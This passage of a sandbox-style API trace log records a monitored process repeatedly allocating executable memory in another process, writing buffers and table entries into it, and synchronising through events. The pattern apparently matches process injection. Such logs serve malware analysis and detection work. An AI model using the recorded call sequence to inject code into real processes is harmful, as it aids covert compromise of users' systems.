Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.243] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.243] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a0b0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.243] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2a, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.243] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52caea*, NumberOfBytesToWrite=0x12, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52caea*, NumberOfBytesWritten=0x28df88*=0x12) returned 0x0 [0241.244] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.244] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.244] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.244] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.244] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.244] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.245] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.245] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.245] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.245] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.245] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20022, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.245] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.245] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a0b8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.245] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.246] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c76a*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c76a*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0241.246] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.246] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.246] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.246] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.247] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.247] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.247] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.247] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.247] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.247] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.247] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.247] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.248] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a0c0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.248] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x31, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.248] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52cafe*, NumberOfBytesToWrite=0x19, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52cafe*, NumberOfBytesWritten=0x28df88*=0x19) returned 0x0 [0241.248] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.248] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.248] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.249] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.249] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.249] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.249] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.249] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.249] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.249] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.250] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20029, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.250] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.250] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a0c8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.250] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.250] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52cb1a*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52cb1a*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0241.250] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.250] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.251] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.251] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.251] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.251] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.251] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.251] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.252] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.252] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.252] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.252] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.252] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a0d0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.252] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.252] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52cb2e*, NumberOfBytesToWrite=0x17, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52cb2e*, NumberOfBytesWritten=0x28df88*=0x17) returned 0x0 [0241.252] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.253] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.253] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.253] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.253] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.253] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.253] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.254] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.254] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.254] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.254] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20027, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.254] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.254] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a0d8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.254] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2a, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.254] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52cb48*, NumberOfBytesToWrite=0x12, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52cb48*, NumberOfBytesWritten=0x28df88*=0x12) returned 0x0 [0241.255] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.255] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.255] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.255] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.255] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.256] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.256] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.256] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.256] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.256] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.256] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20022, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.256] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.256] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a0e0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.257] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x34, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.257] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c74c*, NumberOfBytesToWrite=0x1c, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c74c*, NumberOfBytesWritten=0x28df88*=0x1c) returned 0x0 [0241.257] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.257] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.257] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.257] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.258] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.258] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.258] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.258] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.258] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.258] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.258] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2002c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.259] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.259] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a0e8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.259] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x28, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.259] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c73a*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c73a*, NumberOfBytesWritten=0x28df88*=0x10) returned 0x0 [0241.259] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.259] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.260] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.260] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.260] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.260] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.260] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.260] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.260] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, 